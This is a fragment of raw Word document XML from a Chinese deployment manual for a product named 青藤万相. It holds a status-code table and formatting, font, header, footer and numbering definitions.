          <w:p w14:paraId="5DAB46EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECCA9EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9F8292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>准备执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CF60057" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFA7B3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50566C43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E841A69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BD167CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1477ED6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DBACE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21844ED8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="011ADA89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B87C0D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01FE001B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0856B2ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="259"/>
      <w:bookmarkEnd w:id="319"/>
    </w:tbl>
    <w:p w14:paraId="26C0D0C6" w14:textId="53205E8C" w:rsidR="00B53D9B" w:rsidRPr="000449B2" w:rsidRDefault="00B53D9B" w:rsidP="00497C54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B53D9B" w:rsidRPr="000449B2" w:rsidSect="009807A8">
      <w:headerReference w:type="default" r:id="rId20"/>
      <w:footerReference w:type="default" r:id="rId21"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="567" w:footer="28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A85F0" w14:textId="77777777" w:rsidR="00166514" w:rsidRPr="00DA4190" w:rsidRDefault="00166514" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA4190">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3511E430" w14:textId="77777777" w:rsidR="00166514" w:rsidRPr="00DA4190" w:rsidRDefault="00166514" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA419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阿里巴巴普惠体 2.0 55 Regular">
    <w:panose1 w:val="00020600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002FF" w:usb1="7ACF7CFB" w:usb2="0000001E" w:usb3="00000000" w:csb0="0004009F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId1" w:subsetted="1" w:fontKey="{BF0E1948-A3C5-4AAF-98D3-8EEC4612265A}"/>
    <w:embedBold r:id="rId2" w:subsetted="1" w:fontKey="{3B358A73-B3A0-4404-B582-65AF85E48CF3}"/>
    <w:embedItalic r:id="rId3" w:subsetted="1" w:fontKey="{D02669F1-67AA-4E61-9581-62E7164CC7D6}"/>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思源黑体 CN Normal">
    <w:panose1 w:val="020B0400000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000207" w:usb1="2ADF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="00060107"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86B7D" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:pStyle w:val="a9"/>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69BE" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:pStyle w:val="a9"/>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A4F1" w14:textId="77777777" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00FB10C9" w:rsidP="00336A2F">
    <w:pPr>
      <w:pStyle w:val="a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75F6D" w14:textId="6F20043B" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00000000" w:rsidP="0014057C">
    <w:pPr>
      <w:pStyle w:val="a9"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:fldSimple w:instr=" DOCPROPERTY  日期  \* MERGEFORMAT ">
      <w:r w:rsidR="00732DC3">
        <w:t>2022.09</w:t>
      </w:r>
    </w:fldSimple>
    <w:r w:rsidR="00A057AD">
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:fldSimple w:instr=" DOCPROPERTY  文档密级  \* MERGEFORMAT ">
      <w:r w:rsidR="00732DC3">
        <w:t>密级：公开</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5E033" w14:textId="77777777" w:rsidR="00166514" w:rsidRPr="00DA4190" w:rsidRDefault="00166514" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA4190">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="256C3E1F" w14:textId="77777777" w:rsidR="00166514" w:rsidRPr="00DA4190" w:rsidRDefault="00166514" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA419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8A6ED" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">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C03CC" w14:textId="4355DB06" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">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4BA76" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:spacing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E373A" w14:textId="77777777" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00FB10C9">
    <w:pPr>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CD95E" w14:textId="41844F25" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00F82C28">
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText>DOCPROPERTY  产品名称  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00090665">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>青藤万相</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00A057AD" w:rsidRPr="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00A057AD" w:rsidRPr="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText>DOCPROPERTY  手册名称  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00346AC0">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>部署文档（标准）</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>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C6CA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36053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0AC97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16A725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1BB203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0F9B6C3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA44B354"/>
    <w:lvl w:ilvl="0" w:tplc="0FE63B4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>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0F2D0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191E3BF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E32AF04"/>
    <w:lvl w:ilvl="0" w:tplc="997A7D92">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a0"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C3134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23BC1125"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E138BA08"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="84"/>
        <w:szCs w:val="48"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2  "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="800000"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3  "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="800000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%4. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="800000"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="1134" w:hanging="510"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="20"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="图%1-%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial Narrow" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="20"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="表%1-%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="510"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="18"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlRestart w:val="5"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:ind w:left="1418" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:hint="default"/>
        <w:color w:val="auto"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="4"/>
      <w:lvlText w:val="步骤%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="737"/>
        </w:tabs>
        <w:ind w:left="737" w:hanging="737"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="18"/>
        <w:vertAlign w:val="baseline"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D0D0D5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5412C248"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="380B3E9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428E7301"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83607BAE"/>
    <w:lvl w:ilvl="0" w:tplc="5616DD9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43A2E33"/>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4D9E618C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="793A4C72"/>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ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="63034456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C30E7846"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="84"/>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suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="Arial" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="auto"/>
        <w:sz w:val="30"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="Arial"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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6443314E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83FE0E2C"/>
    <w:lvl w:ilvl="0" w:tplc="F6BC2A00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:b/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>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A7858EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B18114C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Roboto" w:eastAsia="思源黑体 CN Normal" w:hAnsi="Roboto" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="00A4C5"/>
        <w:sz w:val="84"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7211599F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="808601BA"/>
    <w:lvl w:ilvl="0" w:tplc="90D0EBF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a1"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="787B633F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5621580"/>
    <w:lvl w:ilvl="0" w:tplc="2F1A4206">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a2"/>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861042576">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="83890995">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1988588816">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="515660060">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1355038387">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1566599994">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1448312228">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1660108232">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="483547160">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="673996292">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="17659765">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1595745861">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="76293707">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1441292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7003894">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1142967292">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="880747693">
